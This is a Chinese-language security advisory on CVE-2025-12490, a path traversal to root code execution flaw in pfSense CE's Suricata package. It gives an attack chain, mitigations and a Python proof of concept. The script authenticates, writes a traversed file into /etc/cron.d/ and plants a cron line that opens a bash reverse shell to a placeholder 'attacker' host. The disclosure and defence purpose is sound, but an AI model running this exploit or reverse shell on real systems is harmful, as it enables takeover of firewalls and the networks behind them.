CVE-2025-12490: Netgate pfSense CE Suricata 路径遍历远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-12490

漏洞类型

路径遍历/远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Netgate pfSense CE (Suricata package)

漏洞概述

CVE-2025-12490是Netgate pfSense CE中Suricata软件包的一个高危安全漏洞，CVSS评分达到8.8分。该漏洞允许经过身份验证的远程攻击者在受影响系统上创建任意文件，进而可能实现以root权限执行任意代码。漏洞的根本原因在于Suricata软件包在处理用户提供的路径时缺乏适当的验证，攻击者可以利用路径遍历技术（如使用../等特殊字符）访问系统任意位置并写入恶意文件。此漏洞由趋势科技零日 Initiative（ZDI）发现并披露，编号为ZDI-CAN-28085。由于pfSense作为开源防火墙和路由软件被广泛应用于企业网络边界防护，该漏洞对网络安全构成严重威胁。攻击者一旦成功利用，可完全控制防火墙设备，进而对内网进行进一步渗透或窃取敏感数据。

技术细节

该漏洞存在于Netgate pfSense CE的Suricata软件包中，具体问题在于对用户提供的路径参数缺乏充分的安全验证。攻击者可以通过构造包含路径遍历序列（如../）的特殊路径字符串，使应用程序在文件操作时绕过预期目录限制，将文件写入系统任意位置。漏洞利用过程如下：首先攻击者需要获取pfSense的低权限账号凭据；然后通过Web界面或API接口向Suricata包发送恶意构造的路径参数；由于缺少路径规范化处理和边界检查，系统会将文件写入攻击者指定的位置（如cron任务目录、启动脚本目录等）；最终通过覆盖系统文件或创建计划任务实现以root权限执行任意代码。ZDI披露的ZDI-CAN-28085正是针对此漏洞的详细技术分析。GitHub上的修复提交（36b2303dfca35a1183d76f26bcc6ce26d4ea682d）表明开发者已添加路径验证逻辑以防止路径遍历攻击。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标系统为Netgate pfSense CE，并确认Suricata软件包已安装

STEP 2

Credential Acquisition

通过社工、暴力破解或其他方式获取pfSense的低权限用户账号凭据

STEP 3

Authentication

使用获取的凭据登录pfSense Web管理界面或API接口

STEP 4

Craft Malicious Payload

构造包含路径遍历序列（如../../../）的恶意路径，目标是写入系统目录如/etc/cron.d/

STEP 5

Send Exploit Request

通过Suricata包的文件操作功能发送恶意路径参数，触发路径遍历漏洞

STEP 6

File Creation

系统将攻击者控制的文件内容写入目标路径，成功创建计划任务文件

STEP 7

Remote Code Execution

当cron服务执行计划任务时，以root权限执行植入的恶意命令，建立反向shell

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12490 PoC - pfSense Suricata Path Traversal RCE
# Note: Requires low-privilege authentication

import requests
import sys
from urllib.parse import quote

TARGET = "https://target-pfsense.local:443"
USERNAME = "lowpriv_user"
PASSWORD = "password123"

# Authenticate and get session
session = requests.Session()
login_url = f"{TARGET}/index.php"
auth_data = {
    "usernamefld": USERNAME,
    "passwordfwd": PASSWORD,
    "login": "Login"
}

response = session.post(login_url, data=auth_data, verify=False)
if "csrf_token" not in response.text:
    print("[-] Authentication failed")
    sys.exit(1)

print("[+] Authenticated successfully")

# Extract CSRF token
import re
csrf_match = re.search(r'name=__csrf_magic[^"]*"[^"]*value="([^"]+)"', response.text)
csrf_token = csrf_match.group(1) if csrf_match else ""

# Path Traversal payload to write to cron.d
# Writing to /etc/cron.d/ for root execution
malicious_path = "../../../etc/cron.d/malicious"
content = "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'\n"

# Send malicious request to Suricata package
exploit_url = f"{TARGET}/suricata/settings.php"
exploit_data = {
    "__csrf_magic": csrf_token,
    "log_file_path": malicious_path,
    "log_content": content,
    "save": "Save"
}

response = session.post(exploit_url, data=exploit_data, verify=False)
if response.status_code == 200:
    print("[+] Path traversal exploit sent")
    print(f"[+] Payload: {malicious_path}")
else:
    print("[-] Exploit failed")

影响范围

Netgate pfSense CE < 2.7.2 (with Suricata package)

Netgate pfSense CE < 24.03 (with Suricata package)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制pfSense管理接口的网络访问，仅允许管理终端直接访问；2）禁用不必要的用户账号，确保最小权限原则；3）启用pfSense的入侵检测/防御功能监控可疑活动；4）定期检查/etc/cron.d/、/etc/cron.daily/等计划任务目录是否有异常文件；5）考虑使用VPN通道访问pfSense管理界面；6）如果Suricata包非必需，可暂时卸载以消除攻击面。